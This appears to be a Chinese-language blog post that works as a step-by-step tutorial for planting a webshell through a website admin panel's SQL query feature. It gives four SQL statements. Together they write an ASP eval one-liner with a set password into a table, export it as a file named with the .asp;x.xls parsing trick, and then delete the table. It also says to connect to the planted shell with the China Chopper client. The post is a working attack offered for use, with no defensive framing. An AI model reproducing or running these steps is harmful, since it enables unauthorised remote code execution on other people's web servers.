首页 网络安全利用后台SQL查询语句拿webshell

利用后台SQL查询语句拿webshell

今天,朋友给了一个比较好玩的后台

有SQL查询功能

在后台的主页,或者备份什么的,可以得到网站的物理路径,这里我没有传马,直接点击了备份数据库,重点是得到物理路径,后台主页,或者各种爆物理路径,还要看运气和自由发挥了

 

以下拿webshell步骤

第一句代码

create table cmd (a varchar(50))

第二句代码

insert into cmd (a) values (‘<%evalrequest(“qing520”)%>’)

第三句代码

select * into [a] in ‘d:wwwrootwjqcadadmin163Databackupx.asp;x.xls’ ‘excel 4.0;’ from cmd

 (注:绝对目录自己想办法找吧)

第四句代码

drop table cmd

直接菜刀里连接http://www.xxxxx.com/x.asp;x.xls一句话 密码是qing520


版权声明:如非注明文章皆由阿尔法凡原创,转载请注明出处!
本文链接:利用后台SQL查询语句拿webshell
收藏本站:Ctrl+D即可收藏,期待再次光临